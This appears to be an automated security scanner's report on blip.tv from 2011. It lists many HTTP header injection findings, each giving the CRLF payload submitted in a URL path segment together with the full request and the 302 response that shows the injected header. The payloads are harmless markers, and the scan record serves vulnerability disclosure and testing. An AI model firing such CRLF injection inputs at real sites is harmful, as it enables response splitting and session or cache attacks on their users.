HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/2e516 f8e22e5a25d/hbdrgpvFPAI Content-Type: text/html; charset=iso-8859-1 Content-Length: 290 Date: Thu, 20 Jan 2011 00:38:38 GMT X-Varnish: 1324528912 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/2e516 f8e22e5a25d/hbdrgpvFP ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload a8ba0%0d%0a60cebc1b852 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/a8ba0%0d%0a60cebc1b852 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/a8ba0 60cebc1b852 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:38 GMT X-Varnish: 1498218377 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/a8ba0 60cebc1b852">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 61d32%0d%0a59830f082de was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /61d32%0d%0a59830f082de/hbdrgpvFPAI.m4v/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/61d32 59830f082de/hbdrgpvFPAI.m4v/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 310 Date: Thu, 20 Jan 2011 00:38:41 GMT X-Varnish: 2146047566 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/61d32 59830f082de/hbdrgpvFP ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload e67be%0d%0ab38a774bfd6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/e67be%0d%0ab38a774bfd6/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/e67be b38a774bfd6/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:38:41 GMT X-Varnish: 344229197 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/e67be b38a774bfd6/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload f5faf%0d%0aad9111d4936 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /f5faf%0d%0aad9111d4936/hbgSgoqOawI HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/f5faf ad9111d4936/hbgSgoqOawI Content-Type: text/html; charset=iso-8859-1 Content-Length: 290 Date: Thu, 20 Jan 2011 00:38:46 GMT X-Varnish: 1274884570 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/f5faf ad9111d4936/hbgSgoqOa ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 88d2a%0d%0a103103db6ac was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/88d2a%0d%0a103103db6ac HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/88d2a 103103db6ac Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:46 GMT X-Varnish: 344229973 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/88d2a 103103db6ac">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 4fd2e%0d%0a220762a834a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4fd2e%0d%0a220762a834a/hbgSgoqOawI.m4v/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/4fd2e 220762a834a/hbgSgoqOawI.m4v/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 295 Date: Thu, 20 Jan 2011 00:38:46 GMT X-Varnish: 1274884648 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/4fd2e 220762a834a/hbgSgoqOa ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 47bf5%0d%0af684f642c98 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/47bf5%0d%0af684f642c98/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/47bf5 f684f642c98/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:38:47 GMT X-Varnish: 1025269940 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/47bf5 f684f642c98/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 6a214%0d%0af56409e4ca8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6a214%0d%0af56409e4ca8/hodpgpH4MwI HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/6a214 f56409e4ca8/hodpgpH4MwI Content-Type: text/html; charset=iso-8859-1 Content-Length: 290 Date: Thu, 20 Jan 2011 00:38:50 GMT X-Varnish: 1248908985 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/6a214 f56409e4ca8/hodpgpH4M ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 8b662%0d%0a1fb4d628927 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/8b662%0d%0a1fb4d628927 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/8b662 1fb4d628927 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:50 GMT X-Varnish: 1498220485 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/8b662 1fb4d628927">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload fda23%0d%0a38745f1aedb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /fda23%0d%0a38745f1aedb/hodpgpH4MwI.m4v/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/fda23 38745f1aedb/hodpgpH4MwI.m4v/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 295 Date: Thu, 20 Jan 2011 00:38:51 GMT X-Varnish: 344230771 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/fda23 38745f1aedb/hodpgpH4M ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 8e377%0d%0aaa5e4d2ecf9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/8e377%0d%0aaa5e4d2ecf9/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/play/8e377 aa5e4d2ecf9/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 299 Date: Thu, 20 Jan 2011 00:38:51 GMT X-Varnish: 1498220580 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/8e377 aa5e4d2ecf9/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 66c9d%0d%0a2e07d85723 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /66c9d%0d%0a2e07d85723/hqkXgpzqKAI HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/66c9d 2e07d85723/hqkXgpzqKAI Content-Type: text/html; charset=iso-8859-1 Content-Length: 289 Date: Thu, 20 Jan 2011 00:38:38 GMT X-Varnish: 1025268406 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/66c9d 2e07d85723/hqkXgpzqKA ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 655a4%0d%0ac59653d05d0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/655a4%0d%0ac59653d05d0 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/655a4 c59653d05d0 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:38 GMT X-Varnish: 1498218407 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/655a4 c59653d05d0">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload f678a%0d%0a360b9d92f78 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /f678a%0d%0a360b9d92f78/hqkXgpzqKAI.m4v/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/f678a 360b9d92f78/hqkXgpzqKAI.m4v/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 310 Date: Thu, 20 Jan 2011 00:38:38 GMT X-Varnish: 1025268476 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/f678a 360b9d92f78/hqkXgpzqK ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload a85d0%0d%0add04bd7a515 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/a85d0%0d%0add04bd7a515/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/a85d0 dd04bd7a515/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:38:38 GMT X-Varnish: 1498218472 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/a85d0 dd04bd7a515/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload a5687%0d%0a4177d1e0688 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /a5687%0d%0a4177d1e0688/hsYBgpzsBwI HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/a5687 4177d1e0688/hsYBgpzsBwI Content-Type: text/html; charset=iso-8859-1 Content-Length: 290 Date: Thu, 20 Jan 2011 00:38:38 GMT X-Varnish: 1324529026 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/a5687 4177d1e0688/hsYBgpzsB ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 2e593%0d%0afe762a762a0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/2e593%0d%0afe762a762a0 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/2e593 fe762a762a0 Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Date: Thu, 20 Jan 2011 00:38:39 GMT X-Varnish: 1324529081 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/2e593 fe762a762a0">her ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload 1a9b0%0d%0ad91b20837c5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1a9b0%0d%0ad91b20837c5/hsYBgpzsBwI.m4v/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache/2.2.3 (CentOS) Location: http://www.blip.tv/1a9b0 d91b20837c5/hsYBgpzsBwI.m4v/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 310 Date: Thu, 20 Jan 2011 00:38:38 GMT X-Varnish: 1248906927 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/1a9b0 d91b20837c5/hsYBgpzsB ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 55bb5%0d%0aa6e4a855b11 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /play/55bb5%0d%0aa6e4a855b11/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/play/55bb5 a6e4a855b11/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:38:39 GMT X-Varnish: 344228803 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/play/55bb5 a6e4a855b11/">he ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload ded4c%0d%0a9fb8644b8b9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /ded4c%0d%0a9fb8644b8b9/embed/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/ded4c 9fb8644b8b9/embed/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 285 Date: Thu, 20 Jan 2011 00:39:14 GMT X-Varnish: 1274889385 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/ded4c 9fb8644b8b9/embed/">h ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 8f32c%0d%0a2affe04b905 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /players/8f32c%0d%0a2affe04b905/ HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/players/8f32c 2affe04b905/ Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Date: Thu, 20 Jan 2011 00:39:15 GMT X-Varnish: 1248913063 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/players/8f32c 2affe04b905/" ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload e263b%0d%0a6c92da3739c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /e263b%0d%0a6c92da3739c HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/e263b 6c92da3739c Content-Type: text/html; charset=iso-8859-1 Content-Length: 278 Date: Thu, 20 Jan 2011 00:38:54 GMT X-Varnish: 1025271326 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/e263b 6c92da3739c">here</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload c2fc7%0d%0aa64f9f8f909 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c2fc7%0d%0aa64f9f8f909/?bookmarked_by=hotepisodes&skin=json&callback=?&version=2 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/c2fc7 a64f9f8f909/?bookmarked_by=hotepisodes&skin=json&callback=?&version=2 Content-Type: text/html; charset=iso-8859-1 Content-Length: 348 Date: Thu, 20 Jan 2011 00:39:15 GMT X-Varnish: 2146053271 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/c2fc7 a64f9f8f909/?bookmark ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload c847b%0d%0a9db90af76ad was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /c847b%0d%0a9db90af76ad/report_inappropriate HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/c847b 9db90af76ad/report_inappropriate Content-Type: text/html; charset=iso-8859-1 Content-Length: 299 Date: Thu, 20 Jan 2011 00:39:11 GMT X-Varnish: 1274888956 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.blip.tv/c847b 9db90af76ad/report_in ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 7e782%0d%0adfaef70a8a1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /posts/7e782%0d%0adfaef70a8a1 HTTP/1.1 Host: blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;
Response
HTTP/1.1 302 Found Server: Apache Location: http://www.blip.tv/posts/7e782 dfaef70a8a1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 284 Date: Thu, 20 Jan 2011 00:39:12 GMT X-Varnish: 1274888999 Age: 0 Via: 1.1 varnish Connection: close
